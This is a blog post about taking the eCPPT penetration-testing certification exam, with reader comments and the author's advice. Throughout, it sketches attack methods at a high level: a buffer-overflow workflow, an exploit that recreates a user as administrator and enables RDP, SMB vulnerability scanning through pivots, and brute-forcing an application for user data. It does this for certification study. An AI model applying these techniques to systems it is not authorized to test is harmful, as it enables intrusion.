eCPPT Exam

Now, obviously my memory will be a bit hazy as it has been over three months, and I don’t want to include any exam spoilers, but I will do my best to describe the exam and my process.

Day 1 (2/14)
I started off the evening with a nice, romantic Valentine’s Day dinner at Taco Bell with 2 close friends.

The exam kicks off at 9:28pm, and I have nothing but my wits, skills, and 6 Sugar Free Amp energy drinks to help me.

A lot of enumeration and understanding of the network and externally facing systems. Some planning, but I’ve never been great about that.

TONS OF SCREENSHOTS (Evernote is my hero)

Day 2
Some progress as of 24 hours and 3 energy drinks in (~144 hours and 3 energy drinks remaining), but too early to tell.

According to the VM timer I spent around 10+ hours in the environment this day, and didn’t get too burnt out (yet).

Day 3
A bit more progress (and a lot more frustration) as of ~48 hours and 4 energy drinks in, but a lot to go.

Day 5
(no day 4 update)
After ~76 hours and 5 energy drinks (~92 hours and 1 energy drink remaining) I did not make any more progress, other than increased frustrations.

At this point I start to go back over everything both network and lab wise, to try to decide what I might be missing or forgetting.

Additionally, I’m taking screenshots and noting everything down, to prepare for my report.

This is also the point where I start trying to randomly brute force EVERYTHING…not the best solution.

Day 6
~122 hours and 6 energy drinks in (~46 hours and 4 energy drinks (thanks to a friend for the surprise) remain), and I’m making progress again.

Always remember that there are multiple ways to attack something, as well as different payloads…this was something that caused me no shortage of frustration (TRY MORE THAN ONE PAYLOAD NEXT TIME).

“All” that I have left at this point is some custom exploit dev and the DMZ.

Day 6 night/7 morning
The custom exploit dev went along without too many hitches, and with a pretty interesting solution. (Shouldn’t be a spoiler) Instead of a more standard payload (was running into issues), my exploit remotely deleted a user, added that user back, made them an administrator, and then enabled RDP.

At this point I have ~18 hours left and nothing but the DMZ left.

Day 7
As of 11am on the seventh day (~146 hours and 7 energy drinks in), I obtained root level access in the DMZ, thus completing the testing part of the exam.

All that was left at this point was a bit more information (AND SCREENSHOT) gathering, and verifying that I found every vulnerability on the machines instead of just one.

Then I had 7 days to write the report (had 99 pages of unformatted screenshots and notes at this point).

While I don’t have many notes on my report itself, I’ll try to give an understanding of how it went.

I started with 99 pages of screenshots and mostly unsorted/un-formated notes.

From here I sorted them out, added headers, and began looking at sample Penetration Test reports.

All in all, my report ended up being 50 pages in total including an Executive Summary, Vulnerability report (including remediation steps), and source code Appendix

While writing the report wasn’t that hard with all of my notes, it was still something very new to me, and a valuable experience.

The only real advice I could give on this is to take constant screenshots and notes, make sure you have a format in mind, and don’t wait until the last-minute.

As of March 7th @ 12:12pm, I received the following e-mail:
“Our instructors at eLearnSecurity want to congratulate with you and award you with the eLearnSecurity Certified Professional Penetration Tester certificate. You are now an eCPPT!”

doyler on Githubdoyler on Twitter

Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he’s done it all. To show for it, he has obtained an OSCP, eCPPT, eWPT, eWPTX, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Penetration Testing Consultant for SecureWorks. His previous position was a Senior Penetration Tester for a major financial institution.

When he’s not figuring out what cert to get next (OSCE?!) or side project to work on, he enjoys playing video games, traveling, and watching sports.


Filed under Security Not Included

92 Responses to eCPPT Exam

  1. Alex

    Wow! Does the exam actually last 7 days(report writing aside)??That’s a lot more than the OSCP!Could you also tell approx. how many machines did you have to root?

    • doyler

      Yup, you get 7 days for the attacking portion and then 7 days more for the reporting portion of the exam.

      Definitely a lot more time than the OSCP, but I believe you’re expected to be a bit more thorough and not just root the box in any way possible.

      There was a website, a few internal machines, and then the machine in the DMZ. Overall, under 10 total machines still.

  2. PincoPallino

    Can you write to me at my email?

    I want ask you some questions!

  3. Sasha

    I want to ask a few questions.
    Can you write to me at my email?

  4. Alessandro Rocchi

    Hi Ray
    Can I ask you some questions?
    Can you contact me at my email address?
    Thank you πŸ˜‰

  5. Joel

    Hi, can i ask you some questions?

    Hope you reply to my email.
    Thank you!

  6. Alejandro

    Hello Doyle, i really enjoy your review about the eCPPT exam, it was really insightful. I will do my exam in the next week and i am study all the material where i considerer i have a little flaws, However i want you to ask you some question about it if is possible of course!

    So if you have time, i will really appreciate it if you can help me to get more insight about this!

    thank you in advance….

    Best regards…


    • Hi Alex,

      Sure, what in particular do you have questions about/how would you like me to contact you?

      Good luck with your exam regardless!

      (Oh, I didn’t delete your comment by the way, I just hadn’t approved it yet)


    • John

      I tried ecppt exam but very badly stuck on system security section. I found the executable/ python files and downloaded them on captured server, where I had already uploaded immunity with mona. The rest should be a piece of cake, found the number of args to reach EIP, practically (immunity and mona pc script did not bring results), then found jmp esp with mona, constructed the entire exploit with reverse tcp payload and set my reverse handler. All fine, routed the exploit to victim machine, but never got a shell. 7 jmp/esp, call esp where returned by mona,all tried, but nothing. I disabled dep, but still nothing. null session did not give me something. Any advice?

      • If your exploit is working locally, then it might be an issue with your payload. There could be an antivirus or firewall blocking the payload that you are trying. Have you tried more than just the one reverse tcp payload yet? That is most likely the issue.

        • John

          Good evening again,
          Regarding your last, indeed I insisted a lot, and that costed me in time and fail, no local buffer overflow and exploitation achieved locally; Actually, app seems to go wrong (overflow) but not manage anything more. Though I have found using alternatively python script ( and foo..manager.exe that there should be some kind of customer id policy: only numerical characters, with length up to seven. alphanumerical returned errors on py and exe file showed that was reading up to seven chars from id. Random test, returned two users. So, I wrote a bash script to bruteforce the application, feeding it with possible combinations created with crunch (actually I wrote again my own script instead of using crunch) and take all users data…. but no time left. Then I think I should try this info with net use or any other smb tool to get a connection to shares. Server is vulnerable to null session, but by that only, not much luck. I tried to sniff with wireshark, nothing. Analyzed pcaps, with tshark and bro, still nothing. There should be some other application running on server, although it warns that older web app, not has been set offline. Not clear yet, what I have to do. Now, I am writing my report and waiting for better chances next week. This phase seems very tricky, but I am optimist, if I pass it I will reach the to the end. Thank you.

  7. Charly

    Thinking about taking this one, it looks really interesting.

    I read on many sites that they give you a lab with an objetive, but archiving that objetive is not the way to pass. So, are you supposed to break any thing?

    • Hi Charly,

      It was interesting, and definitely enjoyable. As far as the labs are concerned, they are separate from the exam.

      The exam has a necessary, but not sufficient, objective that you need to reach. You still need to perform a full penetration test and report every vulnerability that you find in the network.

      That make sense?

  8. Diego

    Hi Doyler,

    i just discovered your blog and i want to ask one question, i’m in my third day of my exam and i stuck on exploit development since day two, i,m a little confused and its draving me crazy, do you have some advice to approx it? maybe some resources to learn more and crack that exploit? thank you give you my email

      • Diego

        Hello Doyler thank you for the resources, im into them right know because i fail terrible in te exam ;( my exploit didn’t work and im was not able to compromise any other computer in the corporate network. so i came to you again hopefully you can give me one hint because i am very frustrated.
        i was able to detect the other computer in the corp-network one XP with some smb sharing open services for example IPC% but when i try to connect to digger more info, i can’t, i just simply can access, the computer told me Access denied, so my suspicious are that i can only advance in the exam if successfully write the exploit for the computer listening that service? or i can enter in the corporate network compromising another computer ? because i think i try anything but i can’t enter in any other computer thing it’s the exploit what is driving me crazy.. so if you can tell if there is a other way to enter the corporate network compromising other computer i will very appreciate that, please!!!

        regarding the post, you can delete before you authorize it, and you got my email, just i hope you can have the time to read it.

        thank you Doyler and have a nice day!!

        • I’m sorry about that, but hopefully those resource help you brush up on your buffer overflows!

          If you are unable to connect with an SMB client for more info, then anonymous access is probably disabled. In that case, you might want to scan for SMB vulnerabilities, to see if you can find any. For example, using NMAP NSE scripts – (hint: smb-vuln-* will use all available NSE scripts that start with that).

          As far as the buffer overflow is concerned, yes, that is the only way to compromise the machine that is running that application.

          You’re welcome, and good luck.

          • Hello Doyler,

            thank you for your advice, i try to use NSE but without any successful result, when you use proxy chains NSE scans will not work, i try redirecting the traffic to the specific port i want to connect so in that way a was able to use NSE, however when i try to scan for vulnerabilities the session close because the scan it’s to noisy i think.

            Maybe my routing it’s wrong and i need use something else instead of metasploit?

            thank you Doyler for your advice and happy new year!!!

          • Yea, you might be able to get the NSE scripts to route through a proxy (I think SSHuttle might work instead).

            But yea, it could just be a routing issue.

            That said, you may be able to scan for the SMB vulnerabilities more manually with SMBclient/exploits through your proxy chains.

        • Kate

          Hey Diego,
          What’s your email address?

  9. kate

    Hi Doyler,

    I’m currently doing my eCPPT exam, and I need your help.

    So far I got the highest privilege shell on the web server, but I can’t exploit the DMZ or any machine in the corporate network. I can only scan the corporate machines and identify two Windows hosts. I also found the .exe and .py files hosted on one of the corporate machines, which I know I have to overflow the buffer.

    Do the .exe and .py files have something to do with exploiting the corporate network or are they just there for me to prove they have buffer overflow vulnerabilities?

    I’m completely stuck right now. Please…Point me in the right direction. Give me a hint. Anything.

    Thanks in advance. (Sorry I spoiled a bit so reply to this message to my private email if possible)

    • Hi Kate,

      You haven’t spoiled too much, but I can edit your comments if you do.

      As far as the .exe and .py are concerned, they are in reference to the buffer overflow that you know you need to exploit. You’ll need to utilize them to write and test your buffer overflow. Once you have it completed, you’ll need to see if you can find a remote version of it listening somewhere…

      Good luck!

      • Kate

        Yo Doyler,

        The good news is I proceeded to root two more machines in the corporate network πŸ™‚ The bad news is I’m now completely stuck not knowing how to root the DMZ πŸ™ I got one user’s FTP credentials but when I RDP’d in there was nothing in the DMZ server. On top of that it doesn’t respond to port scans so I have no way of fingerprinting it, meaning I can’t run a backdoor on the DMZ server’s behalf. Please Doyler…Guide me.

        Am I supposed to mount password and MitM attacks against the DMZ or something? Oh man am I lost…

        • Awesome, that’s some good progress at least.

          You definitely don’t need to perform any password or MiTM attacks.

          If you have FTP creds, and you can RDP, then that’s a great start. If you couldn’t actually get RDP to work, then maybe you need to try a different venue. Also make sure to exfiltrate as much information as possible from the machines that you do manage to exploit.

  10. steve

    Hey Doyler

    Can you write to me at my email?

    I wan’t ask you some questions!


  11. marco

    HI Man
    Congratulations for your cert.
    I am doing the exam, and I want to ask you some things. I don’t want to spoiler here !
    Can you write to me at my email?

    Thanks a lot

  12. ericsoe

    Does ecppt as a required for oscp exam? I failed oscp once i attempted for first time. Should I extend lab and try again ? or should I get ecppt first? Appreciate ur help!

    Thanks in advance,
    – eric

  13. ericdoe

    OMG! thank u so much! Highly appreciated πŸ™‚

  14. John

    Hi Doyler,

    Great post and well done.

    I appreciate it if you could send me an email to ask you a question.


  15. Stefano Brugis

    Hi Ray
    Can I ask you some questions?
    Can you contact me at my email address?
    Thank you

  16. mapo

    Wow! I’ve already taken the eJPT cert and now i am studying to obtain e eCPPT.
    I have to admit i’m going slow with the course but personally i need a lot to re-elaborate things.
    As i work as web developer, the web app part of the couse was much much easier than the system security section. I’m a bit struggling with that, i admit it! Any general tips to understand better the BOF and the shellcoding?
    I hope i can take the exam before october, i can’t wait to have obtain the cert.
    Ps. i’ve discovered this blog 10 minutes ago and i really enjoyed the article and the comments.

  17. Tai

    Hi Doyler,

    Can I say, great article and really kind of you to respond to everyone’s comments. I’m looking to sit the PTP exam this weekend, not sure I’m ready but thought I’d give it a go. I made notes of all the lab solutions but have’t had time to go through them again and also noted all the important commands from various sections which I’m hoping to use during the exam.

    Any last minute tips before the exam? Would be good to have some useful advice as I’m a little worried I won’t know where to start and then try everything instead of using a structured approach, nerves does that to a person!
    The other concern I have is around the Buffer Overflow, finding it and then creating a script from scratch to talk to an application if this isn’t similar to what we’ve been taught in the labs.

    Looking forward to your wisdom πŸ™‚


    • Hi Tai,

      I’m always glad to help people, and best of luck with the exam!

      I think just going over everything in the course, this post, and any common questions that people might have (see the comments) would be more than enough.

      Make sure you stick to your workflow as best as possible, and keep good notes.

      The buffer overflow isn’t difficult as long as you follow the steps that the course taught. Additionally, there is a comment here with a TON of resources for more practice if you’d like.

      Good luck again!

  18. Tai

    Hi Doyler,

    Struggling a little here, [spoilers redacted]. Much appreciated!

    • Sorry, don’t want to give too much away, but make sure you go back over the course material and your labs!

      • Tai

        Hi Doyler,

        I’ve made some good progress, managed to get through to the end location (don’t want to give too much) but cant seem to find a way to exploit the device.
        I’ve not tackled the buffer overflow as yet, I’m just a little confused as how I’m meant to do it without being able to put the server into immunity and see it overwriting EIP. Any suggestions?
        The labs taught us to use the graphical ftp client application which then connects to a server with malicious payload within a script.

        • Tahir Hussain

          Hi Doyler,

          Thought I’d let you know I managed to root the tricky box and only now leaves me with the Buffer Overflow, will run out of time for that it looks like.

        • Tahir Hussain

          Hi Doyler,

          Thought I’d let you know I managed to successfully overflow the buffer!


          • Congrats, and glad to hear that!

            Hopefully you managed to get everything, or at least know what you might be missing for the retake.

            Let me know how it goes.

  19. Mikey

    Hello Doyler,

    Thinking about doing the course soon instead of OSCP, as per recommendation, but a little hesitant with Buffer Overflows. Was wondering, does the Buffer Overflow for the exam require you to overcome SEH, stack canary, ASLR or DEP?

    I’ve historically had problems with overcoming stack canaries in my line of work, so wanted to understand if this was the case. Also, are you tied to a particular programming language or can you use perl, c++?

    Thank You πŸ™‚

    • Hi Mikey,

      No where near anything for this buffer overflow (or the OSCP to be honest). Both of them are functionally the same:

      Overflow buffer, control EIP, find JMP, make simple JMP to shellcode, win.

      The OSCE is going to be the first course offered by either that will start with any of those topics.

      As far as languages are concerned, you aren’t constrained to any. A lot of the examples will be in Python or C depending on relevance, but anything you write (or use) can be in the language of your choice.

      • Mikey

        Thanks Doyler!

        A little less scared now! I’m assuming you have a suitable machine without security parameters, such as XP (based on some stuff I’ve read) to run the exploit from or are you expected to do this in Kali? I’ve obviously only practised this on Windows XP to date (old PTB course) and not Linux.

        I’ll try and read up as much as I can, probably wait for a voucher or discount first πŸ™‚


        • I do have an XP machine that I use for some exploit development, but you do not need it for the course.

          You’ll be provided with the VM and appropriate vulnerable software in both the lab, as well as the exam, environment.

          Good luck, and let me know how it goes!

  20. john

    Hello Doyler,

    thanks in advance for your feedback, I already comprise web server and 3 machine on the network including dev exp, i have ftp for dmz but I got stuck on this can you give any hint,
    and should I comprise all the machine on the network.

    • Hi John,

      I’m sorry that I can’t give you any hints, but good luck with the machine!

      You should try to compromise every machine in the network that you find, but your goal is to find every vulnerability. If you can’t get a partial, or even full compromise, then that doesn’t necessarily mean that you missed something.

  21. Tai

    Hi Doyler,

    Would it be possible to send you a PM, not necessarily about the exam.


  22. Mokaz

    Hey there Doyler,

    I’ve been through OSCP & OSCE. I’m actually thinking about getting a 4 in the Box @ eLearnSecurity. Targets are eCPPT, eCRE, eNDP & eWPTX.

    Do you think this makes sense, or will i be bored?


    • Hey Mokaz,

      Awesome, and grats on your OSCE! I’m hoping to have mine done by the end of this year myself.

      I love the 4 in a Box, though I’ve never taken the eNDP personally.

      eCPPT – you’ll probably be bored a little to be honest, as it is VERY similar to the OSCP. That said, if you see anything in the syllabus that you don’t know, it might be ok. Your other options for this slot would be another defensive course, eMAPT, or even eWPT.

      eCRE – I haven’t finished yet, but it should still be plenty useful and fun.

      eWPTX – you won’t be bored at all, a great course.

  23. Tai

    Hi Doyler,

    Thought I’d let you know, I passed my eCPPT. Thanks for your advice on this page, it was invaluable πŸ™‚

    • Awesome, congratulations! Glad that I could at least give some advice.

      • Tai


        For anyone else sitting it, down be overly stressed about the BO, providing you are familiar with the content in the lab, it will not be too different in the exam. I tackled the BO towards the end once everything became clear.

  24. Rollix709

    Hey Doyler,

    Looking to get your opinion on a couple things, but not looking for answers or anything of the sort. More informational if you’re able to help.

    E-mail if you get a chance,


  25. Susan

    Hi Doyler,
    I’m on my ecppt right now.
    I’ve successfully exploited [sensitive information removed], but i’m stuck with other hosts [sensitive information removed]…i’ve nmapped them to know how service run on them and tried common vuln with metasploit but with no result…can you tell me where is my fail?

    P.s. above you said you used “more than one payload”, i tried more different payload but with no result.
    Thank you in advance!

    • Hi Susan,

      First, I’ve removed any spoilers from your comment as to not spoil it for others. Remember, this is a penetration test, so your job is to find as many vulnerabilities as possible and then report it to the client, that’s it.

      As far as the “more than one payload” is concerned, if a different payload didn’t work, then you might be fine.

      Good luck!

  26. waqas ahmed farooqi

    Hello Doyler
    Seen your posts, loved your supporting attitude.
    Hope you will be fine. I am an information security professional and currently interested in E-Learning Security ECPPT certification. I need some help so please answer me the following questions.

    1. ECPPT paper will be given from home?
    2. After how much time of ECPPT registration paper must be given?
    • Hi, glad you enjoy my posts, and hopefully I can help!

      You take the eCPPT exam from home, using the same VPN connectivity you use for the lab environments. There is no paper per-se, but a penetration engagement followed by the report.

      That depends on which version of the course you sign up for. The Barebone edition doesn’t have an exam, the Full gives you 180 days to complete the course from the day you begin, and there is no time limit for the Elite version.

      • waqas ahmed farooqi

        Thanks a lot for your response, so nice of you brother. If possible please share some resources which will help in the preparation of eCPPT certification.

        • Other than the course materials, you don’t really need anything in preparation of the course or exam.

          That said, if you struggle or think you will struggle with the buffer overflow, then the above comments should have everything you’ll need!

          Let me know when you sign up, and how it goes.

  27. Josh

    Hey Doyler,

    Thank you so much for the review! I’m currently taking the course, and it’s always fun to read reviews of the course and exam. Do you have tips (without spoiling anything) to review or be a be sure to know for the exam? The labs that they provide are pretty good, but I’m probably overthinking that the exam is going to be 4x hard then the labs.

    • Other than maybe a few of the links in the comments above, you should be good!

      The course material covers everything in the exam, you just need to make sure that you understand what you’re doing.

      Follow your process (Information Gather -> Enumerate -> Exploit -> Post Exploitation -> Information Gather), document everything, and you’ll be good to go.

      That + make sure you understand how to do a basic stack-based buffer overflow.

Leave a Reply

Your email address will not be published. Required fields are marked *

ERROR: si-captcha.php plugin: GD image support not detected in PHP!

Contact your web host and ask them to enable GD image support for PHP.

ERROR: si-captcha.php plugin: imagepng function not detected in PHP!

Contact your web host and ask them to enable imagepng for PHP.